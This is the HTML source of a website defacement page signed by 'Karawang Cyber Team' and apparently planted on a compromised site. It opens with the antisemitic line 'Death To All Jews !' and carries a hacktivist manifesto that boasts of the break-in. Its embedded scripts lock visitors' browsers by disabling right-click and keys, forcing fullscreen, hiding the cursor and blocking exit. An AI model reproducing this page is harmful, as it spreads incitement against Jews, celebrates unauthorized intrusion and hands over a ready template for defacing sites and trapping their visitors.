
Death To All Jews !
Hacked By Karawang Cyber Team
<style type='text/css'>
@font-face {
    font-family: 'BebasNeueRegular';
    src: url(https://'http://silvership.co.il/fonts/BebasNeue-webfont.eot');
    src: url(https://'http://silvership.co.il/fonts/BebasNeue-webfont.eot?') format('embedded-opentype'),
         url('http://silvership.co.il/fonts/BebasNeue-webfont.woff') format('woff'),
         url('http://silvership.co.il/fonts/BebasNeue-webfont.ttf') format('truetype'),
         url('http://silvership.co.il/fonts/BebasNeue-webfont.svg') format('svg');
    font-weight: normal;
    font-style: normal;
}
/* CSS reset */
body,div,dl,dt,dd,ul,ol,li,h1,h2,h3,h4,h5,h6,pre,form,fieldset,input,textarea,p,blockquote,th,td { 
	margin:0;
	padding:0;
}
html,body {
	margin:0;
	padding:0;
}
table {
	border-collapse:collapse;
	border-spacing:0;
}
fieldset,img { 
	border:0;
}
input{
	border:1px solid #b0b0b0;
	padding:3px 5px 4px;
	color:#979797;
	width:190px;
}
address,caption,cite,code,dfn,th,var {
	font-style:normal;
	font-weight:normal;
}
ol,ul {
	list-style:none;
}
caption,th {
	text-align:left;
}
h1,h2,h3,h4,h5,h6 {
	font-size:100%;
	font-weight:normal;
}
q:before,q:after {
	content:';
}
abbr,acronym { border:0;
}
/* General Demo Style */
body{
	font-family: Constantia, Palatino, 'Palatino Linotype', 'Palatino LT STD', Georgia, serif;
	background: #000;
	font-weight: 400;
	font-size: 15px;
	color: #aa3e03;
	overflow-y: scroll;
	overflow-x: hidden;
}
.ie7 body{
	overflow:hidden;
}
a{
	color: #333;
	text-decoration: none;
}
.container{
	position: relative;
	text-align: center;
}
.clr{
	clear: both;
}
.container > header{
	padding: 30px 30px 10px 20px;
	margin: 0px 20px 10px 20px;
	position: relative;
	display: block;
	text-shadow: 1px 1px 1px rgba(0,0,0,0.2);
    text-align: left;
}
.container > header h1{
	font-family: 'BebasNeueRegular', 'Arial Narrow', Arial, sans-serif;
	font-size: 35px;
	line-height: 35px;
	position: relative;
	font-weight: 400;
	color: #fff;
	text-shadow: 1px 1px 1px rgba(0,0,0,0.3);
    padding: 0px 0px 5px 0px;
}
.container > header h1 span{

}
.container > header h2, p.info{
	font-size: 16px;
	font-style: italic;
	color: #f8f8f8;
	text-shadow: 1px 1px 1px rgba(0,0,0,0.6);
}
/* Header Style */
.codrops-top{
	font-family: Arial, sans-serif;
	line-height: 24px;
	font-size: 11px;
	width: 100%;
	background: #000;
	opacity: 0.9;
	text-transform: uppercase;
	z-index: 9999;
	position: relative;
	-moz-box-shadow: 1px 0px 2px #000;
	-webkit-box-shadow: 1px 0px 2px #000;
	box-shadow: 1px 0px 2px #000;
}
.codrops-top a{
	padding: 0px 10px;
	letter-spacing: 1px;
	color: #ddd;
	display: block;
	float: left;
}
.codrops-top a:hover{
	color: #fff;
}
.codrops-top span.right{
	float: right;
}
.codrops-top span.right a{
	float: none;
	display: inline;
}

p.codrops-demos{
	display: block;
	padding: 15px 0px;
}
p.codrops-demos a,
p.codrops-demos a.current-demo,
p.codrops-demos a.current-demo:hover{
    display: inline-block;
	border: 1px solid #6d0019;
	padding: 4px 10px 3px;
	font-size: 13px;
	line-height: 18px;
	margin: 2px 3px;
	font-weight: 800;
	-webkit-box-shadow: 0px 1px 1px rgba(0,0,0,0.1);
	-moz-box-shadow:0px 1px 1px rgba(0,0,0,0.1);
	box-shadow: 0px 1px 1px rgba(0,0,0,0.1);
	color:#fff;
	-webkit-border-radius: 5px;
	-moz-border-radius: 5px;
	border-radius: 5px;
	background: #a90329;
	background: -moz-linear-gradient(top, #a90329 0%, #8f0222 44%, #6d0019 100%);
	background: -webkit-gradient(linear, left top, left bottom, color-stop(0%,#a90329), color-stop(44%,#8f0222), color-stop(100%,#6d0019));
	background: -webkit-linear-gradient(top, #a90329 0%,#8f0222 44%,#6d0019 100%);
	background: -o-linear-gradient(top, #a90329 0%,#8f0222 44%,#6d0019 100%);
	background: -ms-linear-gradient(top, #a90329 0%,#8f0222 44%,#6d0019 100%);
	background: linear-gradient(top, #a90329 0%,#8f0222 44%,#6d0019 100%);
}
p.codrops-demos a:hover{
	background: #6d0019;
}
p.codrops-demos a:active{
	background: #6d0019;
	background: -moz-linear-gradient(top, #6d0019 0%, #8f0222 56%, #a90329 100%);
	background: -webkit-gradient(linear, left top, left bottom, color-stop(0%,#6d0019), color-stop(56%,#8f0222), color-stop(100%,#a90329));
	background: -webkit-linear-gradient(top, #6d0019 0%,#8f0222 56%,#a90329 100%);
	background: -o-linear-gradient(top, #6d0019 0%,#8f0222 56%,#a90329 100%);
	background: -ms-linear-gradient(top, #6d0019 0%,#8f0222 56%,#a90329 100%);
	background: linear-gradient(top, #6d0019 0%,#8f0222 56%,#a90329 100%);
	-webkit-box-shadow: 0px 1px 1px rgba(255,255,255,0.9);
	-moz-box-shadow:0px 1px 1px rgba(255,255,255,0.9);
	box-shadow: 0px 1px 1px rgba(255,255,255,0.9);
}
p.codrops-demos a.current-demo,
p.codrops-demos a.current-demo:hover{
	color: #A5727D;
	background: #6d0019;
}
/* Media Queries */
@media screen and (max-width: 767px) {
	.container > header{
		text-align: center;
	}
	p.codrops-demos {
		position: relative;
		top: auto;
		left: auto;
	}
}


</style>
<style type='text/css'>


.cb-slideshow,
.cb-slideshow:after {
    position: fixed;
    width: 100%;
    height: 100%;
    top: 0px;
    left: 0px;
    z-index: 0;
}
.cb-slideshow:after {
    content: ';
    background: transparent url(https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcQa6CIiPVa-bxreW873OMVwzci8BoDyWwTTeA&usqp=CAU) repeat top left;
}
.cb-slideshow li span {
    width: 100%;
    height: 100%;
    position: absolute;
    top: 0px;
    left: 0px;
    color: transparent;
    background-size: cover;
    background-position: 50% 50%;
    background-repeat: none;
    opacity: 0;
    z-index: 0;
	-webkit-backface-visibility: hidden;
    -webkit-animation: imageAnimation 36s linear infinite 0s;
    -moz-animation: imageAnimation 36s linear infinite 0s;
    -o-animation: imageAnimation 36s linear infinite 0s;
    -ms-animation: imageAnimation 36s linear infinite 0s;
    animation: imageAnimation 36s linear infinite 0s;
}
.cb-slideshow li div {
    z-index: 1000;
    position: absolute;
    bottom: 10px;
    left: 0px;
    width: 100%;
    text-align: right;
    opacity: 0;
    -webkit-animation: titleAnimation 36s linear infinite 0s;
    -moz-animation: titleAnimation 36s linear infinite 0s;
    -o-animation: titleAnimation 36s linear infinite 0s;
    -ms-animation: titleAnimation 36s linear infinite 0s;
    animation: titleAnimation 36s linear infinite 0s;
}
.cb-slideshow li div h3 {
    font-family: 'BebasNeueRegular', 'Arial Narrow', Arial, sans-serif;
    font-size: 160px;
    padding: 0 30px;
    line-height: 120px;
    color: rgba(169,3,41, 0.8);

}
.cb-slideshow li:nth-child(3) span {
    background-image: url(https://i.ibb.co/sjKdP67/20231028-062346.jpg);
    -webkit-animation-delay: 12s;
    -moz-animation-delay: 12s;
    -o-animation-delay: 12s;
    -ms-animation-delay: 12s;
    animation-delay: 12s;
}
.cb-slideshow li:nth-child(4) span {
    background-image: url(https://i.ibb.co/8zL3yHz/20231027-175842.jpg);
    -webkit-animation-delay: 18s;
    -moz-animation-delay: 18s;
    -o-animation-delay: 18s;
    -ms-animation-delay: 18s;
    animation-delay: 18s;

}
.cb-slideshow li:nth-child(6) span {
    background-image: url(https://i.ibb.co/7CC0RQH/IMG-20231027-203554.jpg);
    -webkit-animation-delay: 30s;
    -moz-animation-delay: 30s;
    -o-animation-delay: 30s;
    -ms-animation-delay: 30s;
    animation-delay: 30s;
}
.cb-slideshow li:nth-child(7) span {
    background-image: url(https://i.ibb.co/MsfbLgN/20231027-175029.jpg);
    -webkit-animation-delay: 30s;
    -moz-animation-delay: 30s;
    -o-animation-delay: 30s;
    -ms-animation-delay: 30s;
    animation-delay: 30s;
}
.cb-slideshow li:nth-child(8) span {
 background-image: url(https://i.ibb.co/zhwpNYb/IMG-20231030-124324-116.jpg);
 -webkit-animation-delay: 42s;
    -moz-animation-delay: 42s;
    -o-animation-delay: 42s;
    -ms-animation-delay: 42s;
    animation-delay: 42s;
}
.cb-slideshow li:nth-child(9) span {
   background-image: url(https://i.ibb.co/fNBgWLZ/20231026-145356.png);
 -webkit-animation-delay: 48s;
    -moz-animation-delay: 48s;
    -o-animation-delay: 48s;
    -ms-animation-delay: 48s;
    animation-delay: 48s;
}
.cb-slideshow li:nth-child(10) span {
   background-image: url(https://i.ibb.co/M5VhFbJ/20231018-070304.png);
 -webkit-animation-delay: 54s;
    -moz-animation-delay: 54s;
    -o-animation-delay: 54s;
    -ms-animation-delay: 54s;
    animation-delay: 54s;
}
.cb-slideshow li:nth-child(11) span {
   background-image: url(https://i.ibb.co/1LMX14h/97a360a0dfa706d314e69c43f666d046ec219304694e148689ea5fbd787b1f6f-0.jpg);
 -webkit-animation-delay: 60s;
    -moz-animation-delay: 60s;
    -o-animation-delay: 60s;
    -ms-animation-delay: 60s;
    animation-delay: 60s;
}
.cb-slideshow li:nth-child(12) span {
   background-image: url(https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcQu3JOgJHg4NV0WPT092dt6bVxeyLyERQ9IZA&usqp=CAU);
 -webkit-animation-delay: 66s;
    -moz-animation-delay: 66s;
    -o-animation-delay: 66s;
    -ms-animation-delay: 66s;
    animation-delay: 66s;
}
.cb-slideshow li:nth-child(13) span {
   background-image: url(https://cdn.antaranews.com/cache/1200x800/2014/07/20140721112.jpg.webp);
 -webkit-animation-delay: 72s;
    -moz-animation-delay: 72s;
    -o-animation-delay: 72s;
    -ms-animation-delay: 72s;
    animation-delay: 72s;

}


.cb-slideshow li:nth-child(2) div {
    -webkit-animation-delay: 6s;
    -moz-animation-delay: 6s;
    -o-animation-delay: 6s;
    -ms-animation-delay: 6s;
    animation-delay: 6s;
}
.cb-slideshow li:nth-child(3) div {
    -webkit-animation-delay: 12s;
    -moz-animation-delay: 12s;
    -o-animation-delay: 12s;
    -ms-animation-delay: 12s;
    animation-delay: 12s;
}
.cb-slideshow li:nth-child(4) div {
    -webkit-animation-delay: 18s;
    -moz-animation-delay: 18s;
    -o-animation-delay: 18s;
    -ms-animation-delay: 18s;
    animation-delay: 18s;
}
.cb-slideshow li:nth-child(5) div {
    -webkit-animation-delay: 24s;
    -moz-animation-delay: 24s;
    -o-animation-delay: 24s;
    -ms-animation-delay: 24s;
    animation-delay: 24s;
}
.cb-slideshow li:nth-child(6) div {
    -webkit-animation-delay: 30s;
    -moz-animation-delay: 30s;
    -o-animation-delay: 30s;
    -ms-animation-delay: 30s;
    animation-delay: 30s;
}
@-webkit-keyframes imageAnimation { 
	0% {
	    opacity: 0;
	    -webkit-animation-timing-function: ease-in;
	}
	8% {
	    opacity: 1;
	    -webkit-transform: scale(1.05);
	    -webkit-animation-timing-function: ease-out;
	}
	17% {
	    opacity: 1;
	    -webkit-transform: scale(1.1) rotate(3deg);
	}
	25% {
	    opacity: 0;
	    -webkit-transform: scale(1.1) rotate(3deg);
	}
	100% { opacity: 0 }
}
@-moz-keyframes imageAnimation { 
	0% {
	    opacity: 0;
	    -moz-animation-timing-function: ease-in;
	}
	8% {
	    opacity: 1;
	    -moz-transform: scale(1.05);
	    -moz-animation-timing-function: ease-out;
	}
	17% {
	    opacity: 1;
	    -moz-transform: scale(1.1) rotate(3deg);
	}
	25% {
	    opacity: 0;
	    -moz-transform: scale(1.1) rotate(3deg);
	}
	100% { opacity: 0 }
}
@-o-keyframes imageAnimation { 
	0% {
	    opacity: 0;
	    -o-animation-timing-function: ease-in;
	}
	8% {
	    opacity: 1;
	    -o-transform: scale(1.05);
	    -o-animation-timing-function: ease-out;
	}
	17% {
	    opacity: 1;
	    -o-transform: scale(1.1) rotate(3deg);
	}
	25% {
	    opacity: 0;
	    -o-transform: scale(1.1) rotate(3deg);
	}
	100% { opacity: 0 }
}
@-ms-keyframes imageAnimation { 
	0% {
	    opacity: 0;
	    -ms-animation-timing-function: ease-in;
	}
	8% {
	    opacity: 1;
	    -ms-transform: scale(1.05);
	    -ms-animation-timing-function: ease-out;
	}
	17% {
	    opacity: 1;
	    -ms-transform: scale(1.1) rotate(3deg);
	}
	25% {
	    opacity: 0;
	    -ms-transform: scale(1.1) rotate(3deg);
	}
	100% { opacity: 0 }
}
@keyframes imageAnimation { 
	0% {
	    opacity: 0;
	    animation-timing-function: ease-in;
	}
	8% {
	    opacity: 1;
	    transform: scale(1.05);
	    animation-timing-function: ease-out;
	}
	17% {
	    opacity: 1;
	    transform: scale(1.1) rotate(3deg);
	}
	25% {
	    opacity: 0;
	    transform: scale(1.1) rotate(3deg);
	}
	100% { opacity: 0 }
}
@-webkit-keyframes titleAnimation { 
	0% {
	    opacity: 0;
	    -webkit-transform: translateX(200px);
	}
	8% {
	    opacity: 1;
	    -webkit-transform: translateX(0px);
	}
	17% {
	    opacity: 1;
	    -webkit-transform: translateX(0px);
	}
	19% {
	    opacity: 0;
	    -webkit-transform: translateX(-400px);
	}
	25% { opacity: 0 }
	100% { opacity: 0 }
}
@-moz-keyframes titleAnimation { 
	0% {
	    opacity: 0;
	    -moz-transform: translateX(200px);
	}
	8% {
	    opacity: 1;
	    -moz-transform: translateX(0px);
	}
	17% {
	    opacity: 1;
	    -moz-transform: translateX(0px);
	}
	19% {
	    opacity: 0;
	    -moz-transform: translateX(-400px);
	}
	25% { opacity: 0 }
	100% { opacity: 0 }
}
@-o-keyframes titleAnimation { 
	0% {
	    opacity: 0;
	    -o-transform: translateX(200px);
	}
	8% {
	    opacity: 1;
	    -o-transform: translateX(0px);
	}
	17% {
	    opacity: 1;
	    -o-transform: translateX(0px);
	}
	19% {
	    opacity: 0;
	    -o-transform: translateX(-400px);
	}
	25% { opacity: 0 }
	100% { opacity: 0 }
}
@-ms-keyframes titleAnimation { 
	0% {
	    opacity: 0;
	    -ms-transform: translateX(200px);
	}
	8% {
	    opacity: 1;
	    -ms-transform: translateX(0px);
	}
	17% {
	    opacity: 1;
	    -ms-transform: translateX(0px);
	}
	19% {
	    opacity: 0;
	    -ms-transform: translateX(-400px);
	}
	25% { opacity: 0 }
	100% { opacity: 0 }
}
@keyframes titleAnimation { 
	0% {
	    opacity: 0;
	    transform: translateX(200px);
	}
	8% {
	    opacity: 1;
	    transform: translateX(0px);
	}
	17% {
	    opacity: 1;
	    transform: translateX(0px);
	}
	19% {
	    opacity: 0;
	    transform: translateX(-400px);
	}
	25% { opacity: 0 }
	100% { opacity: 0 }
}
/* Show at least something when animations not supported */
.no-cssanimations .cb-slideshow li span{
	opacity: 1;
}
@media screen and (max-width: 1140px) { 
	.cb-slideshow li div h3 { font-size: 100px }
}
@media screen and (max-width: 600px) { 
	.cb-slideshow li div h3 { font-size: 50px }
}
</style>

 
	<script type='text/javascript' src='https://googledrive.com/host/0B0FAryoVedK0Szk4WW9GR3ZKWDg/modernizr.custom.86080.js'></script>
    
    <body id='page'>
        <ul class='cb-slideshow'>
            <li><span>Image 01</span><div><h3></h3></div></li>
            <li><span>Image 02</span><div><h3></h3></div></li>
            <li><span>Image 03</span><div><h3></h3></div></li>
            <li><span>Image 04</span><div><h3></h3></div></li>
            <li><span>Image 05</span><div><h3></h3></div></li>
            <li><span>Image 06</span><div><h3></h3></div></li>
<li><span>Image 07</span><div><h3></h3></div></li>
<li><span>Image 08</span><div><h3></h3></div></li>
<li><span>Image 09</span><div><h3></h3></div></li>
<li><span>Image 10</span><div><h3></h3></div></li>
<li><span>Image 11</span><div><h3></h3></div></li>
<li><span>Image 12</span><div><h3></h3></div></li>
<li><span>Image 13</span><div><h3></h3></div></li>
<li><span>Image 14</span><div><h3></h3></div></li>
<li><span>Image 15</span><div><h3></h3></div></li>
<li><span>Image 16</span><div><h3></h3></div></li>
        </ul>
        <div class='container'>
            <!-- Codrops top bar -->
            <div class='codrops-top'>

                </a>
                <span class='right'>

                    </a>
                </span>
                <div class='clr'></div>
            </div><!--/ Codrops top bar -->
            <header>


				<p >
	<html>
<head>
<title>HacKeD By ./Karawang Cyber Team</title></head>
<body style="background-repeat: repeat; background-position: center; background-attachment: fixed; oncontextmenu="return false;" onkeydown="return false;" onmousedown="return false;" onclick="document.getElementById('lagu').play();fs()" id="body">

 <link rel="SHORTCUT ICON" href="https://i.ibb.co/JkrJMy3/20231015-211120.png" type="image/gif"> 
 <meta charset="UTF-8"> 
 <meta name="Author" content="./Karawang Cyber Team"/> 
 <meta name="copyright" content="./Karawang Cyber Team"/> 
 <meta name="description" content="Pawned by ./Karawang Cyber Team"/> 
		<link href="https://fonts.googleapis.com/css?family=Acme" rel="stylesheet">
		 <script language="JavaScript">
      window.onbeforeunload = confirmExit;

      function confirmExit() {
        return "are you sure ? wkwk";
      }

      function fs() {
        var elem = document.documentElement;
        if (elem.requestFullscreen) {
          elem.requestFullscreen();
        } else if (elem.msRequestFullscreen) {
          elem.msRequestFullscreen();
        } else if (elem.mozRequestFullScreen) {
          elem.mozRequestFullScreen();
        } else if (elem.webkitRequestFullscreen) {
          elem.webkitRequestFullscreen();
        }
        document.getElementById("body").style.cursor = 'none';
        document.onkeydown = function(e) {
          return false;
        }
        document.addEventListener("keydown", e => {
          if (e.key == "F11") e.preventDefault();
        });
      }
    </script>
<script id="rendered-js">
<body oncontextmenu="return false" onkeydown="return false"> 
		<script language='JavaScript1.2'>
			function ejs_nodroit()
			  {
			  return(false);
			  }
			
			document.oncontextmenu = ejs_nodroit;
		</script>


		<style type='text/css'>
			body{
			background-position:top left;
			background-size:100% 100%;
			background-repeat:no-repeat;
			background-attachment:fixed;
			}
			h1 {color: #333;font-size: 100px;margin: 1px auto;text-align:center;text-transform:uppercase;}
			.neon {color: #FFFFFF;text-shadow: 0 0 5px #1ab4e7, 0 0 10px #1ab4e7, 0 0 30px #18a2d0, 0 0 45px #18a2d0, 0 0 60px #18a2d0;}
			.matrix {color: #FFFFFF; font-family:Arial, Courier, Monotype; font-size:10pt; text-align:center; width:10px; padding:0px; margin:0px;}
			.auto-style1 {	text-align: center;}
			.auto-style2 {
			text-align: center;
			color: #5BEEFF;
			}
			.auto-style3 {
			color: #545454;
			font-size: medium;
			}
			.auto-style6 {
			color: #545454;
			}
			.auto-style8 {
			text-align: center;
			font-family: Arial;
			}
			.auto-style9 {
			font-size: xx-large;
			}
			.auto-style10 {
			color: #B7B7B7;
			}
		</style>
		<script type='text/javascript'>




			<!--
				//Disable right click script
				//visit http://www.rainbow.arch.scriptmania.com/scripts/
				var message='Sorry, right-click has been disabled';
				///////////////////////////////////
				function clickIE() {if (document.all) {(message);return false;}}
				function clickNS(e) {if
				(document.layers||(document.getElementById&&!document.all)) {
				if (e.which==2||e.which==3) {(message);return false;}}}
				if (document.layers)
				{document.captureEvents(Event.MOUSEDOWN);document.onmousedown=clickNS;}
				else{document.onmouseup=clickNS;document.oncontextmenu=clickIE;}
				document.oncontextmenu=new Function('return false')
				// -->
		</script>
		<!-- 
			<link href='http://fonts.googleapis.com/css?family=Ubuntu+Mono:400,700' rel='stylesheet' type='text/css'> </link> -->
		<!-- <script type='text/javascript'>
			</script> -->

<center> 
<h2 class="glow">#OPSBADAI</h2> 
<img src="https://i.ibb.co/JkrJMy3/20231015-211120.png" width="25%"> <h2 class="glow2" >Pawned By <span style="color:#red;font-family:Acme 0px 0px 10px">./Karawang</span><span style="color:#red;font-family:Acme 0px 0px 10px"> Cyber Team</span></b></h2> <b>
<span style="font-family:Acme;color:#00b4ff;">Your Site's Security Has Been Compromised By <span style="font-family:Acme;color:white;">Karawang Cyber Team</span>
<p>Greetings world we are Karawang Cyber Team</p>
<p>Because we are the voice of Palestine and we will not remain silent ! </p>
<p>We are the sound of the forgotten people, the freedom fighter in the cyberworld</p>
<p>and our main target is Zionism and israel, if you are asking why your website got hacked by us,</p>
<p>its basically because we want to share our message and  show the world who we are,</p>
<p>we are not looking for fame but we have a goal to achieve  </p>
<p>we supporte all hackers teams and we supporte all the freedom mouvement in the world.</p>
<p>Muslims are everywhere - We will enter to Palestine soon :) remember this :D</p>
<p>#OpIsrael Engaged , Expect us ! </p>
 <div style="font-size:10px;color:red;text-shadow:grey 0px 0px 3px"> <br> <font size="2px" style="font-family: Acme;color:#00b4ff;" >
#OpsIsrael #FreePalestina #SaveGaza
#KarawangCyberTeam #DragonForceMalaysia #JapaneseHacker #BlackShinchanXXX #AnonGhost #AnonymousIndonesia
<br>UCEN HAXOR - StarXploit - ./XkiiBoys - Wahyu Haxor - ./MalaikatGalauers -
./GobLay - Fitrii - ./MalaikatPerasaanmu - Caca - NilaChan - Agatha - MalaikatGalauers - 
Dodo - Ririn - Mr.S.Naura - TiaraXCans - Nurmala -  QUEEN FITRII - Shine - Vina - Nesya
</font><br> <font size="2px" style="font-family: Acme;color:#00b4ff;" > Copyrights &copy; Karawang Cyber Team</font><br> <p> 
<video autoplay loop allowscriptaccess='always' allowfullscreen='false' width='1' height='0' >

	<audio src="https://kosred.com/a/zcroxu.mp3" autoplay="true" id="lagu" loop=""></audio>

	</p>
 </center> 
 </header>
        </div>
    </body>
</html>     

<center>HacKeD By Karawang Cyber Team</center></body></html>                                                

